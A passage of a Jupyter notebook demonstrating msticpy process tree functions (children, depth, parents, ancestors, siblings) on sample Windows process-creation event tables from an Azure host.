c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x172c2019-02-10 01:27:25.17300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 01:27:25.173MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x172c...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/3431007
\n", "

5 rows × 35 columns

\n", "
" ], "text/plain": [ " TenantId \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "\n", " Account \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "\n", " EventID \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 4688 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "\n", " TimeGenerated \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 22:11:59.877 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 23:16:28.153 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 2019-02-09 23:55:46.057 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-10 00:22:33.813 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-10 01:27:25.173 \n", "\n", " Computer \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... MSTICAlertsWin1 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "\n", " SubjectUserSid \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... S-1-5-18 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "\n", " SubjectUserName \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "\n", " SubjectDomainName \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... WORKGROUP \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "\n", " SubjectLogonId \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 0x3e7 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "\n", " NewProcessId ... \\\n", "proc_key ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x1c54 ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x123c ... \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 0xda8 ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x7fc ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x172c ... \n", "\n", " source_index_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "\n", " ProcessId_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "\n", " NewProcessName_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "\n", " TimeGenerated_orig_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 1970-01-01 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 \n", "\n", " parent_key \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "\n", " IsRoot IsLeaf IsBranch \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... False False True \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "\n", " path parent_index \n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/69 1007 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/103 1007 \n", "c:\\windowsazure\\secagent\\wasecagentprov.exe0xda... 1007/123 1007 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/134 1007 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/343 1007 \n", "\n", "[5 rows x 35 columns]" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Just get the immediate children of the root process\n", "children = ptree.get_children(p_tree_win, t_root)\n", "children.head()" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### get_tree_depth\n", "Get the depth of a tree." ] }, { "cell_type": "code", "execution_count": 14, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:47.218995Z", "start_time": "2020-08-25T15:53:47.205996Z" }, "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a", "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)", "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6" }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "depth of tree is 4\n" ] } ], "source": [ "# Get the depth of the full tree\n", "depth = ptree.get_tree_depth(full_tree)\n", "print(f\"depth of tree is {depth}\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### get_parent and get_ancestors\n", "Get the parent process or all ancestors." ] }, { "cell_type": "code", "execution_count": 15, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:47.281997Z", "start_time": "2020-08-25T15:53:47.220998Z" }, "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a", "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)", "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6" }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "parent\n" ] }, { "data": { "text/plain": [ "TenantId 52b1ab41-869e-4138-9e40-2a4457f09bf0\n", "Account WORKGROUP\\MSTICAlertsWin1$\n", "EventID 4688\n", "TimeGenerated 2019-02-09 23:20:15.547000\n", "Computer MSTICAlertsWin1\n", "SubjectUserSid S-1-5-18\n", "SubjectUserName MSTICAlertsWin1$\n", "SubjectDomainName WORKGROUP\n", "SubjectLogonId 0x3e7\n", "NewProcessId 0xccc\n", "NewProcessName C:\\Windows\\System32\\cmd.exe\n", "TokenElevationType %%1936\n", "ProcessId 0x123c\n", "CommandLine \"cmd\"\n", "ParentProcessName C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...\n", "TargetLogonId 0x0\n", "SourceComputerId 263a788b-6526-4cdc-8ed9-d79402fe4aa0\n", "TimeCreatedUtc 2019-02-09 23:20:15.547000\n", "EffectiveLogonId 0x3e7\n", "new_process_lc c:\\windows\\system32\\cmd.exe\n", "Name: c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:20:15.547000, dtype: object" ] }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": [ "ancestors\n" ] }, { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\waappagent.exe0x19941970-01-01 00:00:00.00000052b1ab41-869e-4138-9e40-2a4457f09bf0NaN46881970-01-01 00:00:00.000MSTICAlertsWin1NaNNaNNaN0x3e70x1994...NaNNaNNaNNaTNaNTrueFalseFalse1007NaN
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x123c2019-02-09 23:16:28.15300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:16:28.153MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x123c...NaNNaNNaN1970-01-01 00:00:00.000c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/1031007
c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:20:15.54700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:20:15.547MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xccc...986.00x1994C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...2019-02-09 23:16:28.153c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/103/105103
c:\\windows\\system32\\conhost.exe0x14ec2019-02-09 23:20:15.56000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:20:15.560MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x14ec...988.00x123cC:\\Windows\\System32\\cmd.exe2019-02-09 23:20:15.547c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:...FalseTrueFalse1007/103/105/106105
\n", "

4 rows × 35 columns

\n", "
" ], "text/plain": [ " TenantId \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n", "\n", " Account \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... WORKGROUP\\MSTICAlertsWin1$ \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... WORKGROUP\\MSTICAlertsWin1$ \n", "\n", " EventID \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 4688 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 4688 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 4688 \n", "\n", " TimeGenerated \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 00:00:00.000 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 23:16:28.153 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 2019-02-09 23:20:15.547 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 2019-02-09 23:20:15.560 \n", "\n", " Computer \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... MSTICAlertsWin1 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... MSTICAlertsWin1 \n", "\n", " SubjectUserSid \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... S-1-5-18 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... S-1-5-18 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... S-1-5-18 \n", "\n", " SubjectUserName \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... MSTICAlertsWin1$ \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... MSTICAlertsWin1$ \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... MSTICAlertsWin1$ \n", "\n", " SubjectDomainName \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... WORKGROUP \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... WORKGROUP \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... WORKGROUP \n", "\n", " SubjectLogonId \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x3e7 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 0x3e7 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 0x3e7 \n", "\n", " NewProcessId ... \\\n", "proc_key ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x1994 ... \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 0x123c ... \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 0xccc ... \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 0x14ec ... \n", "\n", " source_index_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 986.0 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 988.0 \n", "\n", " ProcessId_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 0x1994 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 0x123c \n", "\n", " NewProcessName_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-... \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... C:\\Windows\\System32\\cmd.exe \n", "\n", " TimeGenerated_orig_par \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaT \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 00:00:00.000 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 2019-02-09 23:16:28.153 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 2019-02-09 23:20:15.547 \n", "\n", " parent_key \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... c:\\windowsazure\\guestagent_2.7.41491.901_2019-... \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:... \n", "\n", " IsRoot IsLeaf IsBranch \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... True False False \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... False False True \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... False False True \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... False True False \n", "\n", " path \\\n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007 \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007/103 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 1007/103/105 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 1007/103/105/106 \n", "\n", " parent_index \n", "proc_key \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... NaN \n", "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1007 \n", "c:\\windows\\system32\\cmd.exe0xccc2019-02-09 23:2... 103 \n", "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09... 105 \n", "\n", "[4 rows x 35 columns]" ] }, "execution_count": 15, "metadata": {}, "output_type": "execute_result" } ], "source": [ "# Get Ancestors\n", "# Get a child process that's at the bottom of the tree\n", "btm_descnt = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n", "\n", "print(\"parent\")\n", "display(ptree.get_parent(p_tree_win, btm_descnt)[:20])\n", "print(\"ancestors\")\n", "ptree.get_ancestors(p_tree_win, btm_descnt).head()" ] }, { "cell_type": "markdown", "metadata": { "ExecuteTime": { "end_time": "2019-12-16T23:30:16.035630Z", "start_time": "2019-12-16T23:30:16.032653Z" } }, "source": [ "### get_process and build_process_key\n", "Get a process record by its key. Build a key from a process object (pandas Series)." ] }, { "cell_type": "code", "execution_count": 16, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:47.297997Z", "start_time": "2020-08-25T15:53:47.283997Z" }, "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a", "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)", "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6" }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "c:\\windows\\system32\\conhost.exe0x14ec2019-02-09 23:20:15.560000\n" ] }, { "data": { "text/plain": [ "'c:\\\\windows\\\\system32\\\\conhost.exe0x15842019-02-10 15:24:56.050000'" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "proc_key = btm_descnt.name\n", "print(proc_key)\n", "ptree.get_process(p_tree_win, proc_key)\n", "\n", "process2 = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[-1]\n", "ptree.build_process_key(process2)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### get_siblings\n", "Get the siblings of a process.\n", "\n", "Some functions take an `include_source` parameter. Setting this to True returns the source process with the result set." ] }, { "cell_type": "code", "execution_count": 17, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:47.345997Z", "start_time": "2020-08-25T15:53:47.299997Z" }, "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a", "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)", "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6", "scrolled": true }, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x1c542019-02-09 22:11:59.87700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:11:59.877MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1c54...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/691007
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x123c2019-02-09 23:16:28.15300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:16:28.153MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x123c...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/1031007
c:\\windowsazure\\secagent\\wasecagentprov.exe0xda82019-02-09 23:55:46.05700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:55:46.057MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xda8...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/1231007
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x7fc2019-02-10 00:22:33.81300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:22:33.813MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x7fc...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/1341007
c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe0x172c2019-02-10 01:27:25.17300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 01:27:25.173MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x172c...NaNNaNNaN1970-01-01c:\\windowsazure\\guestagent_2.7.41491.901_2019-...FalseFalseTrue1007/3431007
\n", "

5 rows × 35 columns

\n", "
